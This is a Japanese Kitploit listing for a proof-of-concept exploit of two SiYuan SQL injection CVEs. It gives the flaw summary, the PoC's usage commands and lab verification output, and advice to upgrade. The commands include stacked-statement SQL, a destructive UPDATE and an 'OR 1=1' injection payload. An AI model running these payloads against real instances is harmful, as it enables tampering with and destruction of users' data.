Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-69084-PoC — CVE-2026-69084/69085 — searchEmbedBlock + searchDocs SQLi を介した SiYuan の任意 SQL 実行 (CVSS 9.9)。v3.7.2 で検証済み、v3.7.3 で拒否。 | Kitploit
ツール/GitHubGitHub/boreas37/cve-2026-69084-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストデータベースセキュリティ
GitHubboreas37/cve-2026-69084-poc

CVE-2026-69084-PoC

CVE-2026-69084/69085 — searchEmbedBlock + searchDocs SQLi を介した SiYuan の任意 SQL 実行 (CVSS 9.9)。v3.7.2 で検証済み、v3.7.3 で拒否。

リポジトリを見る
1119日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-69084 / CVE-2026-69085 — SiYuan 任意SQL実行 & SQLインジェクション

CVE-2026-69084: /api/search/searchEmbedBlock を介した任意SQL実行 CVE-2026-69085: /api/filetree/searchDocs を介したSQLインジェクション CVSS 9.9 (Critical) 各 · CWE-89 · SiYuan <= v3.7.2 (v3.7.3で修正) 公開日 2026-08-03 · 公開時点で公開PoCなし

TL;DR

SiYuan(オープンソースのノートアプリ、github.com/siyuan-note/siyuan)は 攻撃者が制御するSQLをSQLiteデータベースに渡す2つのAPIエンドポイントを公開しています。

CVE-2026-69084 — /api/search/searchEmbedBlock: stmt パラメータは、単一ステートメント制限や読み取り専用制限なしで メインの読み書き用 siyuan.db ハンドルにそのまま渡されます。 SQLiteドライバはスタック(セミコロン区切り)ステートメントを実行するため、 攻撃者はデータベース内の任意の CREATE / / / / を実行できます。 のみで保護されており、公開用 RoleReader トークンで到達可能、 または公開モードで の場合に匿名で到達可能です。

INSERT
UPDATE
DELETE
DROP
CheckAuth
Publish.Auth.Enable=false

CVE-2026-69085 — /api/filetree/searchDocs: keyword パラメータは、エスケープやパラメータバインドなしでSQLに直接連結されます。

両方とも v3.7.3 で sql.CheckSingleStatement() + sql.CheckReadonlyStatementInBox() により修正されました。

Exploit

root@kitploit:~
# 1. 非破壊的プローブ (sqlite_version)
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> --check

# 2. DB書き込みの証明: CREATE TABLE + INSERT
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> --proof

# 3. 任意SQLの実行(スタックステートメント対応)
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> "SELECT * FROM blocks LIMIT 5"
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> "UPDATE blocks SET hpath='PWNED' WHERE id=(SELECT id FROM blocks LIMIT 1)"

# 4. searchDocs SQLi (69085)
python3 CVE-2026-69084.py http://TARGET:6806 --auth <CODE> --searchdocs "x' OR 1=1 --"

インスタンスが公開モードで認証無効(Publish.Auth.Enable=false)で実行されている場合、 --auth はまったく不要です。

検証(Docker上の実SiYuan v3.7.2)

root@kitploit:~
$ python3 CVE-2026-69084.py http://127.0.0.1:6806 --auth test123 --proof
[*] SQL: CREATE TABLE IF NOT EXISTS pwn_69084 (id INTEGER)
[+] SQL accepted (blocks: 0)
[*] SQL: INSERT INTO pwn_69084 VALUES (31337)
[+] SQL accepted (blocks: 0)
[+] DB-WRITE PROOF COMPLETE — pwn_69084 table + 31337 row in siyuan.db

# ホスト側:
$ sqlite3 siyuan.db "SELECT * FROM pwn_69084;"
31337

修正版 v3.7.3 は同じリクエストを拒否します:

  • SELECT 1; CREATE TABLE x → "SQL statement is not single"
  • UPDATE blocks ... → "SQL statement is not a read-only query"
  • 単一の SELECT は引き続き動作(正当な機能は維持)

PoCの内部構造

Python PoCはセッションログイン(/api/system/loginAuth)を実行して 認証Cookieを取得し、脆弱なエンドポイントにPOSTします。 b3log/siyuan:v3.7.2(脆弱)と b3log/siyuan:v3.7.3(修正済み)でテスト済みです。

修復策

  • SiYuanをv3.7.3以降にアップグレードしてください。
  • SiYuanの公開モードを公開する場合は、Publish.Auth.Enable=true を維持し、 強力な RoleReader トークンを使用してください。

参考情報

  • GHSA-p2x7-4c4p-8wh6 (69084)
  • GHSA-5w4j-hchp-r332 (69085)
  • NVD — CVE-2026-69084
  • NVD — CVE-2026-69085
  • VulnCheck advisory

免責事項

認可されたセキュリティテストおよび教育目的のみに使用してください。

ツールをダウンロード